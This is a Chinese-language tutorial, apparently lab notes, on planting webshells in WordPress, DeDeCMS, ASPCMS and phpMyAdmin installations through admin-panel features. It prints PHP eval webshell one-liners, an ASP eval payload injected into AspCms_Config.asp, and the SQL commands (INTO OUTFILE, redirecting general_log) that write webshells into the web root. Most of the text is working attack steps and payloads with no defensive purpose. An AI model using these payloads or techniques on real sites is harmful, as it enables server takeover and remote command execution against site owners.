WordPress
搭建网站
一.上传文件模板
1.从网上随便下载一个模板
2.把我们的模板托出来并改名
写好我们的木马命名为eval;然后进行压缩
3.上传我们的木马模板
上传压缩包即可;网站会帮我们解压
上传成功
找到我们的模板准备连接他
这套网站是开源的;想知道页面模板的路径在哪从网上搜就可以搜到
wp-content/themes/[主题名称]
访问我们的木马;然后连接他就行
二.编辑模板文件
在这里我们可以编辑模板代码
直接写我们的语句
去访问
DeDeCMS
搭建网站;无脑安装
来到后台
一.文件管理
1.新建文件
在核心-->文件式管理器-->新建文件
写进我们的木马
点击访问;就可以进行连接
2.上传文件
在文件上传处也可以上传我们的木马
这个地方是一样的
二.修改模板
生成-->HTML更新-->更新主页HTMl
把网站首页更新为php文件
在模板-->模板管理-->默认模板管理找到我们的首页
在修改添加我们的木马
回来在更新一下
去访问首页然后连接
三.添加广告位
模块-->辅助插件-->广告管理
写入我们的木马
再点击代码;查看我们的目录
去连接
四.SQL写入
系统-->系统设置-->SQL命令行工具
写入我们的木马
select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy/phpstudy_pro/WWW/333.php'
去连接
ASPCMS
一.后台修改配置文件
来到网站后台扩展功能-->幻灯片设置
点击保存拿BP抓包slideTextStatus 字段的值为
1%25><%25eval(request (chr(65)))%25><%25
/config/AspCms_Config.asp
弹出修改成功;我去尝试连接
连接成功
PHPMyAdmin
一.通过日志文件
1.sql语句模式
show global variables like '%general%'; //查询日志文件
set global general_log='on'; //日志保存状态开启;
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'; //修改日志的保存位置。
select '<?php eval($_POST[cmd]);?>';
在去查看一下确保开启
修改存储路径
Ok修改成功
写入木马;去连接日志文件
2.图形化界面
新建-->变量-->过滤
点击编辑改成ON
然后再去sql语句那写入
二.导入导出
select @@datadir //判断路径
猜测web路径
select "<?php @eval($_POST[cmd]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/333.php';
写入后我们去连接
